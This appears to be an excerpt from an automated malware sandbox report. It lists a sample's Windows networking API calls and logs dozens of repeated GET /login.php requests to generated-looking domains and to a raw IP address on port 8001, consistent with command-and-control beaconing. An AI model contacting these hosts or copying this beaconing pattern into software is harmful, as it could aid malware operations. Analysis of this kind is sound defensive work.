Code function: 2_2_02BC4AB0 memset,GetProcessHeap,HeapAlloc,memset,memcpy,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,_snprintf,HttpAddRequestHeadersA,HttpSendRequestA,HttpQueryInfoA,CreateFileA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,memset,InternetReadFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,GetProcessHeap,HeapValidate,GetProcessHeap,RtlFreeHeap,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_02BC4AB0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_414682.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.36.143:8001Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_414682.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.36.143:8001Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.com
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20240908-1853-3379-8a1b-ce08bd3461b1 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1725785613.7387215
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20240908-1853-34e6-b36e-a2256d9e0a9e HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1725785614.8678415
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.comCookie: sid=b166d882-6dbf-11ef-90a1-9c5e8dd41795
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_414682.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.36.143:8001Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comCookie: __tad=1725785613.7387215
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comCookie: __tad=1725785614.8678415
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20240908-1854-12c0-8240-bdabdc5d8efa HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1725785613.7387215
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20240908-1854-132f-8c2f-134916a1e9d0 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1725785614.8678415
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 08:52:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T47TxWVx2O1M5cbssqArJpdhX7PwAwX6T2MVHPd6OO2G0G3sc9VfxLvf7i%2Bpttk5GXvDg%2BUPRmAUWVFCIp2TfkTiR%2BS%2Bj%2BSV8V44H42ml2Mp%2FnHmKOz5uk%2FuT%2FGWUA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfdb40c9d2c8c3c-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 08:52:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B5uCX5xsqR1nBqM0Ng1KwQUjFByFqE2uKX%2BU7ovCRO50o3vth3IOc85p0nYztAHWSyWyocDzTAidxjdEHXrDknyCjDq6WTYS1wN1ztUSvqTTuXTXYo%2FLcM%2FaGKuIPw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfdb41b8afd4373-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 08:53:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="45.6",amp_style_sanitizer;dur="23.2",amp_tag_and_attribute_sanitizer;dur="13.2",amp_optimizer;dur="7.5"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P0BSGN8ltweW1QkLmDeiDFh3RZtcLJndyFskVj6NxKLedPRbrU0Y2MxHydwSdQ7QhCMYrd02CmTqqaAiec0KTCtRUmoDgZwjnH459s5VAs7D7b2KwlHadWzLkfq8Vw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfdb51afbd63338-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 08:53:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="47.8",amp_style_sanitizer;dur="22.5",amp_tag_and_attribute_sanitizer;dur="21.3",amp_optimizer;dur="4.2"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nUXgMjfBq6S2attjTSB7E3iwucP5Hrp9kcsDsELpFuYefC%2BhQmkzn1i7Unw8GjZfPvVqd%2BfvkjYGJYaNnPG3rJYDmRUXZ%2Bz%2BOnwiHwVTmJpIW%2Bct8EhO9gS8DhPx5Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfdb5284f776a57-EWRalt-svc: h3=":443"; ma=86400
